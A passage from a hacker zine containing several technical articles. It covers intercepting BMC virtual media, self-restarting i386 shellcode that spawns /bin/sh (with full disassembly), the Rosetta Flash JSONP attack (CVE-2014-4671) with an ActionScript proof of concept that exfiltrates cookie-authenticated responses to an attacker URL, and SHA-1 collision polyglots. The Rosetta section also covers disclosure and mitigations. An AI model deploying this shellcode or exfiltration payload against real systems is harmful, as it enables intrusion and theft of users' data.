It is interesting to note that in SCSI there are no clients and servers. Instead, there are Initiators and Targets. This applies to many protocols which two distinct roles, both providing services to each other. The classic example is that a web browser provides more valuable information to the web server than vice versa, yet the reason it’s considered the client is that it initiates the connection.

When intercepting network connections, you should consider what services both ends of the connection provide you.


In our example, which intercepts Virtual Media connections between a Java application and BMC, the BMC provides the service of connecting CD-ROMs and removable media to it. While generally this involves a server administrator wasting hours waiting for an operating system to install, we might choose something more fun, such as Tetranglix from PoCGTFO 3:8.

The --cdrom CDROM option in the PoC replaces any mapped CD-ROM with the provided image file.

The service provided by the application is possibly more interesting. A server administrator might connect a USB key to the system, perhaps containing a “kickstart” or “sysprep” file. The provided PoC will export the inserted Removable Media via NBD, which most Linux systems will happily mount as if it were a normal hard drive. This feature can be accessed with --ndb and --ndblisten address:port. Please be kind when testing, as this is exported read/write.

Have fun, stay safe

If you own a system that contains a BMC, please be careful what networks you connect it to, and which networks you access it through. A simple solution might be to connect a VPN device directly to it, and run a VPN client application on your desktop.

Remember that besides bolt-on security, such systems’ management interfaces likely have plenty of other flaws. For example, see the SSH banner that the same BMC produces, or IPMI Cipher 0.

5:10 i386 Shellcode for Lazy Neighbors; or, I am my own NOP Sled.

by Brainsmoke

Who needs a NOP sled when you can jump into the middle of your shellcode and still succeed? The trick here is to set a canary value at the start of the shellcode and check it at the very end. This allows for an exploit to jump right in the middle of the shellcode, because when the canary check fails, the shellcode will just start again from the beginning.

Due to placement of variables in memory by the compiler it is usually possible to guess a payload’s four-byte alignment. Let’s assume a possible entry point at every fourth byte, not bothering with any other offsets as doing this for every single offset would be impossible.21

In order to make this work, no entry point should generate a fault, regardless of the register values. This means we will only be accessing memory through the stack pointer. We also shy away from instructions that are larger than four bytes, such as the five byte long 32-bit push-immediate instruction. Instead, we use smaller instructions to achieve the same goal. In this case we use the four byte long 16-bit push. This means that we, for the greater part of the shellcode, do not have to worry about jumping into the middle of instructions.

For our canary check, at the start of the shellcode we will fill ebp with the 32 most significant bits of the timestamp counter. On modern CPUs this value increases every few seconds. As ebp often contains a pointer to an address on the stack, it is unlikely that it will have the same value initially. Just before popping shell, we will read the timestamp counter again and compare. If they differ, we’ll assume we entered somewhere in the middle of the code and restart from the beginning. As this value changes every once in a while, you might be so unlucky that it changed in the few cycles between the two reads, but in this case our shellcode will just loop one extra time before finishing.

“But,” I hear you say, “what if we jump into the middle of the canary check?” Our canary check, together with the conditional jump to the beginning, and the final syscall instruction cannot possibly fit in four bytes. This is where we make use of unaligned instructions. For the canary check, we use code that does not have instructions that start at a four-byte boundary. At the same time, we make sure that the first two bytes at fourth byte boundary will be 0xeb 0xf2 which, when executed as an instruction will jump fourteen bytes back into the shellcode. This will land it again on a four-byte boundary. Eventually the program counter will land into an earlier part of the shellcode that is in the right instruction chain.

Assuming our shellcode eventually calls int 80h, which is 0xcd 0x80, the final part of our shellcode now looks a little like that in Figure 5.7.

In our normal instruction thread, bytes 0xeb shall become the last byte of an instruction, and the 0xf2 bytes will become the first byte of the next opcode. Fortunately 0xf2 is a prefix code which can be prepended to many short instructions without any harmful side-effects.

As you can see there’s not much room left for our own instructions. Certainly since every fourth byte will need to be part of a multi-byte opcode together with 0xeb. To address this, we will need to find some useful instructions that contain 0xeb.

When 0xeb is used as the second byte of a compare operation (opcode 0x39), it represents the ebp, ebx register pair. We will be using this both as a nop as well as for our canary comparison. Another option is to use 0xeb as the second byte of a conditional jump which, if taken will land you somewhere earlier in the shellcode, on a four-byte boundary.


Figure 5.7: Our shellcode eventually calls int 80h, which is 0xcd 0x80.

Combining those two instruction gives us the building blocks for our canary check: compare two values and jump backward if they do not match. Now all we have to do is load the high 32 bits of the timestamp counter in ebx and restore any spilled registers before calling int 80h. The ebp register already has the right value.

   0000:  0f 31          rdtsc              ;read timestamp counter
 2 0002:  92             xchg edx, eax
   0003:  95             xchg ebp, eax      ;put high dword in ebp
 4 0004:  31 db          xor ebx, ebx       
   0006:  66 53          push bx            
 6 0008:  66 68 75 72    push small 07275h  
   000C:  66 68 62 6f    push small 06F62h  
 8 0010:  66 68 67 68    push small 06867h  
   0014:  66 68 65 69    push small 06965h  
10 0018:  66 68 20 4e    push small 04E20h  
   001C:  66 68 6c 6f    push small 06F6Ch  
12 0020:  66 68 65 6c    push small 06C65h  
   0024:  66 68 20 48    push small 04820h  
14 0028:  66 68 68 6f    push small 06F68h  
   002C:  66 68 65 63    push small 06365h  
16 0030:  89 e1          mov ecx, esp       ;argv[2] -> ecx
   0032:  6a 68          push 068h          
18 0034:  66 68 2f 73    push small 0732Fh  
   0038:  66 68 69 6e    push small 06E69h  
20 003C:  66 68 2f 62    push small 0622Fh  
   0040:  89 e0          mov eax, esp       ;eax=filename=argv[0]
22 0042:  6a 2d          push 02Dh          
   0044:  b2 63          mov dl, 063h       
24 0046:  89 e6          mov esi, esp       ;argv[1] -> esi
   0048:  88 54 24 01    mov [esp+1h], dl   
26 004C:  53             push ebx           
   004D:  89 e2          mov edx, esp       ;envp [ NULL ] -> edx
28 004F:  51             push ecx           
   0050:  56             push esi           
30 0051:  50             push eax           
   0052:  eb 02          jmp short 0056h    
32 0054:  eb aa          jmp short 0000h    ;'midway station'
   0056:  89 e1          mov ecx, esp       ;argv ['/bin/sh',etc]
34 0058:  b3 0b          mov bl, 0Bh        ;__NR_EXECVE -> ebx
   005A:  50  push eax    ;push filename
36 005B:  52             push edx           ;push envp
   005C:  0f 31 92 39    -------------------.
38 0060:  eb f2 93 39    jmp short 0054h ;  / these jumps will all
   0064:  eb f2 5a 75    jmp short 0058h ;  / (eventually) end up
40 0068:  eb f2 5b 39    jmp short 005Ch ;  / at 005C
   006C:  eb f2 cd 80    jmp short 0060h ;  /
42 0070:                 .------------------/
44                       V
   005C:  0f 31          rdtsc
46 005E:  92             xchg edx, eax       ;canary val -> eax
   005F:  39 eb          cmp ebx, ebp        ;no - op
48 0061:  f2 93          repnz xchg ebx, eax ;canary val -> ebx
                                             ;__NR_EXECVE -> eax
50 0063:  39 eb          cmp ebx, ebp        ;canary check
                                             ;OK if zero
52 0065:  f2 5a          repnz pop edx       ;envp -> edx
   0067:  75 eb          jnz 0054h           ;to 'midway station'
54                                           ;if the check fails
   0069:  f2 5b          repnz pop ebx       ;filename -> ebx
56 006B:  39 eb          cmp ebx, ebp        ;nop
   006D:  f2 cd 80       repnz int 80h       ;we're done :-)


5:11 Abusing JSONP with Rosetta Flash

by Michele Spagnuolo, whose opinions are not endorsed by his employer.

In this article I present Rosetta Flash, a tool for converting any SWF file to one composed of only alphanumeric characters, in order to abuse JSONP endpoints. This PoC makes a victim perform arbitrary requests to the vulnerable domain and exfiltrate potentially sensitive data, not limited to JSONP responses, to an attacker-controlled site. This vulnerability is indexed as CVE-2014-4671.

Rosetta Flash leverages zlib, Huffman encoding, and Adler-32 checksum bruteforcing to convert any SWF file to another one composed of only alphanumeric characters, so that it can be passed as a JSONP callback and then reflected by the endpoint, effectively hosting the Flash file on the vulnerable domain.

The Attack Scenario

To better understand the attack scenario it is important to take into account the following three factors:

  1. SWF files can be embedded on an attacker-controlled domain using a Content-Type forcing <object> tag, and will be executed as Flash as long as the content looks like a valid Flash file.

  2. JSONP, by design, allows an attacker to control the first bytes of the output of an endpoint by specifying the callback parameter in the request URL. Since most JSONP callbacks restrict the allowed charset to [a-zA-Z0-9], _ and ., my tool focuses on this very restrictive set of characters, but it is general enough to work with other user-specified alphabets.

  3. With Flash, an SWF file can perform cookie-carrying GET and POST requests to the domain that hosts it, with no crossdomain.xml check. That is why allowing users to upload an SWF file to a sensitive domain is dangerous. By uploading a carefully crafted SWF file, an attacker can make the victim perform requests that have side effects and exfiltrate sensitive data to an external, attacker-controlled, domain.

High profile Google domains (accounts.google.com, www., books., maps., etc.) and YouTube were vulnerable and have been recently fixed. Instagram, Tumblr, Olark and eBay are still vulnerable at the time of writing. Adobe pushed a fix in the latest Flash Player, described in the section on mitigations.

In the Rosetta Flash GitHub repository,22 I provide a full-featured proof of concept and ready-to-be-pasted, weaponized PoCs with ActionScript sources for exfiltrating arbitrary content specified by the attacker in the FlashVars.

How it Works

Rosetta uses ad-hoc Huffman encoders in order to map non-allowed bytes to allowed ones. Naturally, since we are mapping a wider charset to a more restrictive one, this is not really compression, but an inflation! We are effectively using Huffman as a Rosetta Stone.


Figure 5.8: SWF Header Types

A Flash file can be either uncompressed (magic bytes FWS), zlib-compressed (CWS) or LZMA-compressed (ZWS). We are going to build a zlib-compressed file, but one that is actually larger than the decompressed version!

Furthermore, Flash parsers are very liberal, and tend to ignore invalid fields. This is very good for us, because we can force Flash content to the characters we prefer.

Zlib Header Hacking

We need to make sure that the first two bytes of the zlib stream, which is a wrapper over DEFLATE, are a valid combination.

There aren’t many allowed two-bytes sequences for CMF (Compression Method and flags) + CINFO (malleable) + FLG. The latter include a check bit for CMF and FLG that has to match, preset dictionary (not present), and compression level (ignored).

The two-byte sequence 0x68 0x43, which as ASCII is “hC” is allowed and Rosetta Flash always uses this particular sequence.


Figure 5.9: Starting Bytes for Zlib


Figure 5.10: Adler-32 Algorithm

Adler-32 Checksum Bruteforcing

As you can see from the SWF header format in Figure 5.8, the checksum is the trailing part of the zlib stream included in the compressed output SWF, so it also needs to be alphanumeric. Rosetta Flash appends bytes in a clever way to get an Adler-32 checksum of the original uncompressed SWF that is made of just [a-zA-Z0-9_.] characters.

An Adler-32 checksum is composed of two 4-byte rolling sums, S1 and S2, concatenated.

For our purposes, both S1 and S2 must have a byte representation that is allowed (i.e., all alphanumeric). The question is: how do we find an allowed checksum by manipulating the original uncompressed SWF? Luckily, the SWF file format allows us to append arbitrary bytes at the end of the original SWF file. These bytes are ignored, and that is gold for us.

But what is a clever way to append bytes? I call my approach the Sleds + Deltas technique. As shown in Figure 5.11, we can keep adding a high byte sled until there is a single byte we can add to make S1 modulo-overflow and become the minimum allowed byte representation, and then we add that delta. This sled is composed of 0xfe bytes because 0xff doesn’t play nicely with the Huffman encoding.

Now we have a valid S1, we want to keep it fixed. So we add a sled comprising of NULL bytes until S2 modulo-overflows, thus arriving at a valid S2.


Figure 5.11: Adler-32 Manipulation

Huffman Magic

Once we have an uncompressed SWF with an alphanumeric checksum and a valid alphanumeric zlib header, it’s time to create dynamic Huffman codes that translate everything to [a-zA-Z0-9_.] characters. This is currently done with a pretty raw but effective approach that will have to be optimized in order to work effectively for larger files. Twist: the representation of tables, in order to be embedded in the file, has to satisfy the same charset constraints.

We use two different hand-crafted Huffman encoders that make minimum effort in being efficient, but focus on byte alignment and offsets to get bytes to fall into the allowed character set. In order to reduce the inevitable inflation in size, repeat codes (code 16, mapped to 00), are used to produce shorter output that is still alphanumeric.

For more detail, feel free to browse the source code in the Rosetta Flash GitHub repository or the stock version from this zip file.23 And yes, you can make an alphanumeric Rickroll.24


Figure 5.12: DEFLATE Block Format

A Universal, Weaponized Proof of Concept

The following is an example written in ActionScript 2 for the mtasc open-source compiler.

 1 class X {
       static var app : X;
       function X(mc) {
 5         if (_root.url) {
               var r:LoadVars = new LoadVars();
 7             r.onData = function(src:String) {
                   if (_root.exfiltrate) {
 9                     var w:LoadVars = new LoadVars();
                       w.x = src;
11                     w.sendAndLoad(_root.exfiltrate,w,"POST");
13             }
               r . load ( _root . url , r , " GET " ) ;
15         }
       static function main(mc) {
19         app = new X(mc);
21 }

We compile it to an uncompressed SWF file, and feed it to Rosetta Flash, providing an alphanumeric Flash object.

The attacker has to simply host HTML page in Figure 5.13 on his/her domain, together with a crossdomain.xml file in the root that allows external connections from victims, and make the victim load it.

This universal proof of concept accepts two parameters passed as FlashVars. The url parameter is in the same domain of the vulnerable endpoint from which to perform a GET request with the victim’s cookie. The exfiltrate parameter is the attacker-controlled URL to POST the exfiltrated data to in the variable x.


Figure 5.13: Compiled Alphanumeric Flash in HTML

Moreover, we can get Rosetta Flash to force a particular checksum, which means that we can get the checksum, thus the flash file, to end with a particular character, such as “(”, which will be reflected by JSONP.

Mitigations and Fixes

Mitigations by Adobe

Due to the sensitivity of this vulnerability, I first disclosed it internally to my employer, Google. I then privately disclosed it to Adobe PSIRT. Adobe confirmed they pushed a tentative fix in Flash Player 14 beta codename Lombard (version and finalized the fix in version, released on July 8, 2014.

In the release notes, Adobe describes a stricter verification of the SWF file format.

The initial validation of SWF files is now more strict. In the event that a SWF fails the initial validation checks, it will simply not be loaded. We are particularly interested in feedback on obfuscated SWFs generated with third-party tools, and older content.

Mitigations by Website Owners

First of all, it is important to avoid using JSONP on sensitive domains, and if possible use a dedicated sandbox domain.

One mitigation is to make endpoints return the Content-Disposition header attachment; filename=f.txt, forcing a file download. Starting from Adobe Flash 10.2, this is sufficient to instruct Flash Player not to run the SWF.

To be also protected from content sniffing attacks, prepend the reflected callback with /**/. This is exactly what Google, Facebook and GitHub are currently doing.

Furthermore, to hinder this attack vector in Chrome you can also return the Content-Type-Option nosniff. If the JSONP endpoint returns a Content-Type of application/json, Flash Player will refuse to execute the SWF.


Thanks to Gábor Molnár, who created ascii-zip, a source of inspiration for the Huffman part of Rosetta. I learn talking with him in private that we worked independently on the same problem. He privately came up with a single instance of an ASCII SWF approximately one month before I finished the whole Rosetta Flash internally at Google in May 2014 and reported it to HackerOne only. Rosetta Flash is a full featured tool with universal, weaponized PoCs that converts arbitrary SWF files to ASCII thanks to automatic ADLER32 checksum bruteforcing.


5:12 A cryptographer and a binarista walk into a bar.

by Ange Albertini, Binarista and Maria Eichlseder, Cryptographer

So you meet a stingy schizophrenic genie, who grants you just one wish, and that wish is a single hash collision, with a bunch of nasty restrictions. In the following story, cleverness wins over stinginess, as it does, in a classic fairy-tale way! —PML

SHA-1 uses four constants internally. 0x5a827999, 0x6ed9eba1, 0x8f1bbcd and 0xca62c1d6 are the square roots of 2, 3, 5, and 10 respectively. These nothing-up-my-sleeve numbers are supposedly innocent, but nobody knows why they were chosen, rather than any other constants. It’s a common practice in embedded devices to use known checksum algorithms such as SHA-1 but with different internal parameters: it gives you a proprietary algorithm based on a robust model.

What could go wrong?

Aumasson et al.2526 show how to find practical collisions for such modified SHA-1 when the attacker can control these constants.

From a high-level perspective, finding a collision pair is a bit of an involved process. It roughly involves the following, but you should read the paper for full details.

  1. Feeding the difference pattern (explained below) and the fixed bits (w.r.t. the pattern) to an optimized automatic search algorithm.

  2. Experimenting with the parameters until a few reasonable-looking candidates emerge, aborting if none do.

  3. Feeding those candidates to a similar search algorithm with a similar parameter set.

  4. Waiting a day or two for completion, maybe eliminating the less promising candidates successively.

Let’s consider the consequences from a non-cryptographic perspective.

You have a colliding pair of pseudo-random blocks. They took between fifteen and thirty hours to compute, on eighty cores. They have the same SHA-1 checksum (e033efe8e6e74d75c6d0-bbaf2f2eba8d163f70b5) if the internal constants are 0x5a82-7999, 0x88e8ea68, 0x578059de, 0x54324a39 instead of the original ones. You’re happy, you win.


If you look at these blocks as a normal person, you probably think, “This is just colliding random garbage. Big deal!” They just don’t seem that scary. It would be far more useful if you had colliding files using a standard binary format.


Figure 5.14: Colliding shell scripts.

Here are the rules of the game, from the binary perspective.

• You have two different blocks of 0x40 bytes, at offset 0, that yield colliding hashes. You can append the same content to both, of course, and the overall hashes would still collide.

• Certain positions in these blocks are occupied by the same bytes, while bytes in other positions differ. We call the bitwise pattern of the differences a difference pattern and call the bytes/bits that must be the same in both blocks fixed and the rest “random.” Only a handful of such patterns exist that still have practical attack complexity.

• All available patterns have at most three consecutive bytes without a difference. Typically, in every double word, only the middle two bytes have no differences.

• A few more bits can be set to fixed values on top of a difference pattern, but the majority of the remaining bits will need to be “random.” Typically, the more bits you fix, the higher the computational attack complexity. Fixing between 32 and 48 of the 512 bits in the first block usually works fine.

• All available patterns have a difference in the higher nybble of the last byte, and one pattern has no difference in the first three bytes.

This means that you can’t have a magic signature of four bytes in a row in both blocks, nor four 00 bytes in a row, so you already know that you can’t have two files of the same type with a classic four-byte magic value at offset zero.

You must either somehow skip over the randomness or deal with it. We will now discuss various ways to do so.

Skipping over the Randomness

Shell Scripts

You can see that our two blocks start with a hash and contain no carriage-return characters. That pattern is treated as a comment in many scripting languages, and thus ignored as unneeded data. Appended to two differing but colliding comment blocks, the same scripting code could check for some difference and produce different results accordingly. This will result in two colliding scripts, shown in Figure 5.14.


Another possibility is to use one of the header-less file formats, such as an MBR boot sector or a COM executable. Encode some jumps in the constant part, with the relative offset in the differing part. Execution will land in different offsets, where you can have two different stubs of code.

7 Zip & RAR

Archives that are parsed sequentially, such as 7 Zip and RAR, simply scan for their respective signatures at any offset. So to create an archive collision, simply concatenate two archives and remove the first byte of the top archive. Then you have to make sure that one block of the colliding pair ends with the missing byte of the signature. This block will restore the signature of the top archive, whereas the other block will keep it disabled, thus enabling the bottom archive.


Note that these are not exclusive. With a bit of perseverance, you can have a RAR-MBR-Shell colliding polyglot. And append a schizophrenic PDF, too! Why not? ;)


Dealing with Randomness

A JPEG file is made of segments. Each segment is defined by its first two bytes: first 0xff, then an extra marker byte (but never 0x00). For example, a JPEG should start with a Start-of-Image segment, marked 0xff 0xd8.

Most segments then encode a length on two bytes (which is handy because it won’t get out of control if it’s random), and then the content of the segment.

A weird property of the JPEG format is that even though these markers are either constant-sized or encode their length, you can still insert random data between two segments.

How does the parser know where a new segment starts? It looks for an 0xff byte that is followed by a non-null. Thus, if your JPEG encoder outputs an 0xff, it should also output an extra 0x00 afterwards to avoid problems.

This is very handy for us, particularly as several contiguous segments with a length and value (APPx 0xe? and COM 0xfe) will be ignored.

Crafting our Colliding Pair

First, our blocks should be valid JPEGs. They must start with 0xff 0xd8, which we can control. Then we need one last byte we can fully control, 0xff, to start a segment. Then comes the fourth byte, which we’ll set to 0xe?. With luck, both cases will give us a valid+ignored segment start. Lastly comes the size of the segment, which we can’t fully control, but which will not be too large as it’s encoded in two bytes.

So, if we’re lucky enough that the blocks are not too small, end after the 0x40 byte block, and their ends are not too close to each other, we just have to place the segments of two different JPEG pictures where these segments are ending.

Now we just have to hope that none of our random bytes creates an 0xff byte. If we can’t create the 0xff sequence right after the signature, then we could retry later in the file, as other random data will be okay as long as no 0xff appears.

We now have two valid JPEG start markers, and starting at the same offset two dummy segments of different lengths. All that is needed now is to start a comment segment right after the end of the smaller dummy segment, to comment out the first image’s segment that will be placed immediately following the longest dummy segment. After the comment segment, we place the segment of the second image.


Figure 5.15: Colliding Pair of JPEG Headers

In one block, the dummy segment is longer; right after it come the segments of a valid JPEG image. In the other block, the dummy segment is shorter; it is directly followed by a comment segment that covers the rest of the longer dummy chunk and the chunks of the first valid image. Right after this comment segment come the segments of the second JPEG image. (Figure 5.15.)

So now we have two blocks that can integrate any pair of standard JPEG files, provided they’re not too big, and also a RAR archive collision, as one of the blocks ends with an “R”. Why not, when we get the RAR for free?


And a Failure

The PE file format starts with an obsolete DOS header that is 0x40 bytes long (exactly the size of our block!), for which the only relevant elements nowadays are as follows:

• The ‘MZ’ signature, at offset 0.

• A pointer to the PE header, e_lfanew, aligned on four bytes at offset 0x3c

As mentioned before, we know that the pointer will be different between the two blocks, as it is four bytes long. The problem is that the pointer in one of the two blocks will have a bit of its highest nybble set, thus that pointer will be greater than 0x1000000 (that’s greater than 16 Gb). By manually crafting a PE, the greatest value of e_lfanew that was found to be functional is 0xffffff0, which is smaller than the lowest limit, yet very big. That PE itself is 268,435,904 bytes!

Thus, creating colliding PEs doesn’t seem possible with this technique.


Having two different pictures with the same cryptographic hash that you can open in any image viewer is way more impressive than having two random colliding blocks—especially if you can freely use any picture for your final PoCs.

There are more than purely artistic reasons for studying polyglot collisions. When the attacker controls the constants as the hash function is initially specified, he only gets a single collision, a single pair of colliding blocks, for free. Finding more different collisions is as hard as finding one for the original SHA-1. So, if you want to have some freedom in using your collisions in practice, all target file formats must already be supported by your one colliding block.


In order to save significant time and heartache, a script was created that simulated all necessary conditions. (Generate two fully random blocks, set some bytes according to your rules, then check that they work.) This script helped considerably to determine in advance the actual rules to feed the crunching cluster and then to be sure that you have working collisions at the end, rather than waiting a day or two to get the block pairs, which would likely fail to support the intended formats, and be forced to repeat this time-consuming and random process.

That makes two people happy: the cryptographer has a sexy new PoC, while the binarista has a nifty solution to an unusual challenge. Ain’t that neighborly?


5:13 Ancestral Voices Or, a vision in a nightmare.

by Ben Nagy

And there were gardens bright with sinuous rills,
Where blossomed many an incense-bearing tree;
And here were forests ancient as the hills,
Enfolding sunny spots of

Lock up the poets.

For their rhymes, unchecked, lead but to crime
sweet twisted words and wild surmise
call beauty truth, turn truth to lies
light dark heart-fire; poison minds

beware, beware! His flashing eyes, his floating hair
weave a circle round him thrice

Yes, let them sing, in stately thirds
some hymns with fine uplifting words
but we’ll not have the masses stirred
by driving beats and fey discords

Though we ourselves do not compose
we feel licentious music grows
unquiet in the hearts of youth.
Counting stars. Questioning truth.

But oh! that deep romantic chasm which slanted
Down the green hill athwart a cedarn cover!
A savage place! as holy and enchanted
As e’er beneath a waning moon was haunted
By woman wailing for her demon-lover!

They may paint, but only noble scenes
pastorals, in blues and greens
discreetly hung and gently framed
what good can come of art uncaged?

So, twice five miles of fertile ground
with walls and towers were girdled round

For studies of the human form
lead first to nudes and then to porn
and thence to moral turpitude
thus risqué “art” should be eschewed

And while we neither draw nor paint
it’s clear we must control the taint
unsanctioned inspiration brings
illicit loft to raptor’s wing

The shadow of the dome of pleasure
Floated midway on the waves;
Where was heard the mingled measure
From the fountain and the caves.

Of course true art must not be banned
but regulated, measured, planned
taught wisely by trustworthy schools
so art may serve the good of all

No more shall marshal songs be sung
no seditious ditties hummed
no rousing slogans shall be scrawled
defiance sprayed on courthouse walls

And close your eyes with holy dread
For he on honey-dew hath fed,

But the poets, we fear, will not understand
they will twist our good words and mock our sound plans
we can never control their pernicious wordplay
so, quietly must they be

And drunk the milk of Paradise.

Sent Away

Through wood and dale the sacred river ran,
Then reached the caverns measureless to man,
And sank in tumult to a lifeless ocean

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